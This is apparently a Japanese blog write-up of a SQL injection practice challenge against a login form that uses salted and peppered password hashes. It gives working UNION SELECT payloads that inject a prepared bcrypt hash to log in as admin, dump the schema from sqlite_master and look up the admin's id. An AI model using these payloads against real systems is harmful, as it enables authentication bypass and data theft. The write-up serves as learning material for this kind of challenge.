前置き
まだ問題を見てない方は上にあるのでどうぞ
本題
フォームの確認
多分ツールを使えばわかることなのでソースを確認してログイン画面以外ではprepareメソッドを使ってることを確認しました。
SQLの解析
・アカウント作成
newuser.phpでアカウントを作成すると
とシンプルな表示。ですがここで同一メルアドでもう一度作成すると
となりテーブル名が判明。多分UNIQUE制約かな?同時にアカウント名をそろえると(メルアドは違うやつにします)
ユーザーidのカラム名が判明します。なおパスワードについてはNULLも含め特に制約はないようです
・ログイン画面
テーブルのカラム数やパスワードの位置の推定は元記事で解説されているので割愛。
結果を言えばソルトなしSQLと構造は同じようです。
インジェクション内容
これまでの解析を基に以下のようにハックします
- 適当にアカウントを作る。
userid:Alice
password:password
email:a@a
- 以下の内容をフォームに突っ込む
UserID:`Union Select 1,'admin',(Select password FROM users where userid='alice'),4 --
PassWord:password
ん?
とは言ってもこの手法には二つの問題点があります
-
passwordカラムの名前が解析で判明してない
まぁ多分そうだろうなって思って入れてたまたま成功しただけっていう。でこのあと色々方法がないか調べましたがpasswordカラムの名前を知らない状態でどうにかする方法はどうしてもわかりませんでした -
実はユーザー名は肝ではない
ここでフォームに入れる内容に以下に変えると
UserID:`Union Select 2,'admin',(Select password FROM users where userid='alice'),4 --
PassWord:password
というわけでどうやらユーザー名ではなく最初の数字、主キーのidでマイページの識別をしてたようですね。1か0かなっていう予想自体は立てられますが仮にどっちも違った場合は見つける手段は自分にはなかったです。
結論
そもそも解法自体は二つあるようで、それを考慮すると100点満点中30点といったところですかね。
うん、悔しい
追記
ドキュメントを読みます
これは結合のやり方次第ではペッパー貫通できるのでは?
というわけで以下のようにやり方を変更
1.パスワードが十分に長いアカウントを作成
user:SUPERALICE
password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
2.あらかじめハッシュを用意する
$2y$10$CY3RIerMjfCOlz88WSWDM.vebw2cA.QYWvmMQz8pzRepmNUlv/6G6
3.インジェクション
UserID:'UNION SELECT 1,'admin','$2y$10$CY3RIerMjfCOlz88WSWDM.vebw2cA.QYWvmMQz8pzRepmNUlv/6G6',3--
Password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
4.はい
画像略
そしてこうすればソルトなしSQLインジェクションの解説記事にあったように以下のようなインジェクションも組めます
UserID:'UNION SELECT 1,(select group_concat(sql) from sqlite_master),'$2y$10$CY3RIerMjfCOlz88WSWDM.vebw2cA.QYWvmMQz8pzRepmNUlv/6G6',3--
Password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
こうすれば主キーのカラム名がわかるので
UserID:'UNION SELECT (select id from users where userid = 'admin'),'admin','$2y$10$CY3RIerMjfCOlz88WSWDM.vebw2cA.QYWvmMQz8pzRepmNUlv/6G6',3--
Password:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
とすることで
はい
結論2
結局もう一つの解法は思いつきませんでした。なのでいいところ50点ですかね